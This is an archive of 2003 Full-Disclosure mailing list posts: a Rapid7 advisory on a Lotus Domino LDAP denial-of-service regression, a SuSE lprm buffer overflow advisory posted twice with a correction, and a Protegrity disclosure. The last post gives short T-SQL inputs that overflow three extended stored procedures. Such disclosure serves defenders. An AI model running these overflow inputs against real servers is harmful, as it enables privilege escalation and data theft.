[Full-Disclosure] R7-0012: Lotus Notes/Domino R6-beta PROTOS LDAP Denial of ServiceRegression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Rapid7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose, the world's most advanced vulnerability scanner. Linux and Windows 2000/XP versions are available now! ___ Rapid7 Advisory R7-0012 Lotus Notes/Domino R6-beta PROTOS LDAP Denial of Service Regression Published: March 12, 2003 Revision: 1.0 http://www.rapid7.com/advisories/R7-0012.html CVE: CAN-2001-1311 (regression) CERT Note: 583184(regression) CERT Advisory: CA-2001-18(regression) Lotus SPR: DWUU4W6NC8(regression) Bugtraq ID:7039 1. Affected system(s): KNOWN VULNERABLE: o Lotus Notes/Domino R6 pre-release and beta versions o Lotus Domino R5.0.7 and earlier NOT VULNERABLE: o Lotus Notes/Domino R6.0 Gold o Lotus Notes/Domino R6.0.1 o Lotus Notes/Domino R5.0.7a through R5.0.12 2. Summary In July 2001, the PROTOS protocol testing group at the University of Oulu in Finland released an LDAP protocol test suite that exposed flaws in LDAP implementations from multiple vendors. [1] Lotus Domino R5.0.7 and earlier were affected by the PROTOS LDAP issues, resulting in buffer overflows and denial of service against the Domino server. Lotus addressed these issues in Domino R5.0.7a, released May 18th 2001. [2] While regression testing the pre-release and beta versions of Lotus Domino R6 with the PROTOS LDAP test suite, we found that these releases were vulnerable to the issues PROTOS discovered. 3. Vendor status and information Lotus http://www.lotus.com/ http://www.ibm.com/ Lotus was notified and they have fixed this vulnerability. Lotus originally tracked these issues as SPR #DWUU4W6NC8 and are tracking the R6 beta issues with this SPR. [3] See the References section for more information. 4. Solution Users running R6 beta and pre-release builds should upgrade to R6.0 Gold or higher. Due to other vulnerabilities discovered in R6.0 Gold, you should consider upgrading to R6.0.1, which was released in February 2003. Users running R5.0.7a and higher are not affected. Domino incremental installers may be downloaded from the following URL (which has been wrapped): http://www14.software.ibm.com /webapp/download/search.jsp?go=yrs=ESD-DMNTSRVRisb=r 5. Detailed analysis Credit for discovery of this vulnerability goes to the PROTOS project. Please see their LDAP test suite page for more information. [1] 6. References [1] PROTOS - Security Testing of Protocol Implementations http://www.ee.oulu.fi/research/ouspg/protos/ [2] Lotus statement about LDAP vulnerability fixes http://www.kb.cert.org/vuls/id/JPLA-4WESN5 [3] Lotus SPR #DWUU4W6NC8 http://www.notes.net/r5fixlist.nsf/Search!SearchViewQuery=DWUU4W6NC8 7. Contact Information Rapid7 Security Advisories Email: [EMAIL PROTECTED] Web:http://www.rapid7.com/ Phone: +1 (212) 558-8700 8. Disclaimer and Copyright Rapid7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2003 Rapid7, Inc. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. -BEGIN PGP SIGNATURE- Version: PGP 8.0 iQA/AwUBPnA3PyT52JC2U8wAEQLHPQCcDEBlGignyH8zUjKDYkFKn67tZckAn01q iFqZh3acdOC/aMBSRZYWKBlO =ScAz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] SuSE Security Announcement: lprold (SuSE-SA:2003:0014)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:lprold Announcement-ID:SuSE-SA:2003:0014 Date: Thursday, Mar 13th 2003 16:00 MET Affected products: 7.1, 7.2, 7.3 SuSE eMail Server 3.1 SuSE eMail Server III SuSE Firewall Adminhost VPN SuSE Linux Admin-CD for Firewall SuSE Firewall on CD 2 - VPN SuSE Firewall on CD 2 SuSE Linux Enterprise Server for S/390 SuSE Linux Connectivity Server SuSE Linux Enterprise Server 7 SuSE Linux Office Server Vulnerability Type: local privilege escalation Severity (1-10):3 SuSE default package: yes Cross References: Content of this advisory: 1) security vulnerability resolved: buffer overflow in lprm problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - ethereal - qpopper - XFree4 - sendmail - apcupsd - snort - file - zlib - vnc 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The lprm command of the printing package lprold shipped till SuSE 7.3 contains a buffer overflow. This buffer overflow can be exploited by a local user, if the printer system is set up correctly, to gain root privileges. lprold is installed as default package and has the setuid bit set. As a temporary workaround you can disable the setuid bit of lprm by executing the following tasks as root: - add /usr/bin/lprm root.root 755 to /etc/permissions.local - run 'chkstat -set /etc/permissions.local' Another way would be to just allow trusted users to run lprm by executing the following tasks as root: - add /usr/bin/lprm root.trusted 4755 to /etc/permissions.local - run 'chkstat -set /etc/permissions.local' Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/lprold-3.0.48-408.i386.rpm 52a301d88fce69dcf2de53c86d70f51e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/lprold-3.0.48-408.src.rpm 9907cc1bd077493d0bb1a0e646a20022 SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/lprold-3.0.48-407.i386.rpm 364faa0d5266e36d7db90ac223137f2d source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/lprold-3.0.48-407.src.rpm eff9c0ff34e0ad0d313477b998964a26 SuSE-7.1: ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/lprold-3.0.48-407.i386.rpm 5454e913e660a6d409a200a3ddd19f8b source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/lprold-3.0.48-407.src.rpm ad22928b988b8ed055ab5698e15479e4 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/lprold-3.0.48-273.sparc.rpm 88a5f8cf7db0c123776b4fa9f47e9205 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/lprold-3.0.48-273.src.rpm 83860e8bd337b3617f8c59605c8ff847 AXP Alpha Platform: SuSE-7.1: ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/lprold-3.0.48-270.alpha.rpm 651c6141e07560763f07b74c1506d668 source rpm(s): ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/lprold-3.0.48-270.src.rpm 96b67fb75ae0c4702f6e881c665f81dd PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/lprold-3.0.48-297.ppc.rpm 8caba2cc70f7edfa96c23ac3bab3e8bf source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/lprold-3.0.48-297.src.rpm b1741e591445aef7b8aaf83a8a4a34ef SuSE-7.1: ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/lprold-3.0.48-297.ppc.rpm 1b86cd16e6e5b8e63252b9c9a6acd5b9 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/lprold-3.0.48-297.src.rpm e44adcc90b604bc4dc81b43e57f6e161 __ 2) Pending vulnerabilities in
[Full-Disclosure] SuSE Security Announcement: lprold (SuSE-SA:2003:0014)
Republished because of a mistake. Thanks to an attentive user. -BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:lprold Announcement-ID:SuSE-SA:2003:0014 Date: Thursday, Mar 13th 2003 16:58 MET Affected products: 7.1, 7.2, 7.3 SuSE eMail Server 3.1 SuSE eMail Server III SuSE Firewall Adminhost VPN SuSE Linux Admin-CD for Firewall SuSE Firewall on CD 2 - VPN SuSE Firewall on CD 2 SuSE Linux Enterprise Server for S/390 SuSE Linux Connectivity Server SuSE Linux Enterprise Server 7 SuSE Linux Office Server Vulnerability Type: local privilege escalation Severity (1-10):3 SuSE default package: yes Cross References: Content of this advisory: 1) security vulnerability resolved: buffer overflow in lprm problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - ethereal - qpopper - XFree4 - sendmail - apcupsd - snort - file - zlib - vnc 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information The lprm command of the printing package lprold shipped till SuSE 7.3 contains a buffer overflow. This buffer overflow can be exploited by a local user, if the printer system is set up correctly, to gain root privileges. lprold is installed as default package and has the setuid bit set. As a temporary workaround you can disable the setuid bit of lprm by executing the following tasks as root: - add /usr/bin/lprm root.root 755 to /etc/permissions.local - run 'chkstat -set /etc/permissions.local' Another way would be to just allow trusted users to run lprm by executing the following tasks as root: - add /usr/bin/lprm root.trusted 4750 to /etc/permissions.local - run 'chkstat -set /etc/permissions.local' Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/lprold-3.0.48-408.i386.rpm 52a301d88fce69dcf2de53c86d70f51e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/lprold-3.0.48-408.src.rpm 9907cc1bd077493d0bb1a0e646a20022 SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/lprold-3.0.48-407.i386.rpm 364faa0d5266e36d7db90ac223137f2d source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/lprold-3.0.48-407.src.rpm eff9c0ff34e0ad0d313477b998964a26 SuSE-7.1: ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/lprold-3.0.48-407.i386.rpm 5454e913e660a6d409a200a3ddd19f8b source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/lprold-3.0.48-407.src.rpm ad22928b988b8ed055ab5698e15479e4 Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/lprold-3.0.48-273.sparc.rpm 88a5f8cf7db0c123776b4fa9f47e9205 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/lprold-3.0.48-273.src.rpm 83860e8bd337b3617f8c59605c8ff847 AXP Alpha Platform: SuSE-7.1: ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/lprold-3.0.48-270.alpha.rpm 651c6141e07560763f07b74c1506d668 source rpm(s): ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/lprold-3.0.48-270.src.rpm 96b67fb75ae0c4702f6e881c665f81dd PPC Power PC Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/lprold-3.0.48-297.ppc.rpm 8caba2cc70f7edfa96c23ac3bab3e8bf source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/lprold-3.0.48-297.src.rpm b1741e591445aef7b8aaf83a8a4a34ef SuSE-7.1: ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/lprold-3.0.48-297.ppc.rpm 1b86cd16e6e5b8e63252b9c9a6acd5b9 source rpm(s): ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/lprold-3.0.48-297.src.rpm e44adcc90b604bc4dc81b43e57f6e161
[Full-Disclosure] Protegrity buffer overflow
Additional details can be found at http://www.kb.cert.org/vuls/id/247545
There is a company that does encryption of databases called Protegrty. They use extended stored procedures to do the encryption and decryption. I tested 3 of the extended stored procedures and found all 3 vulnerable to buffer overflows.
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',1926))
execute master.dbo.xp_pty_checkusers 'as', @test
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_insert @test, @test, @test
DECLARE @test varchar(8000)
SET @test = (SELECT replicate('x',850))
execute master.dbo.xp_pty_select @test, @test, @test
These security holes are fully exploitable and would allow an attacker to perform any of the following:
1) become sa on the box
2) gain control of the operating system
3) decrypt the sensitive data Protegrity is encrypting
If you have this software, contact the vendor for the patch.
Do you Yahoo!?
Yahoo! Web Hosting - establish your business online
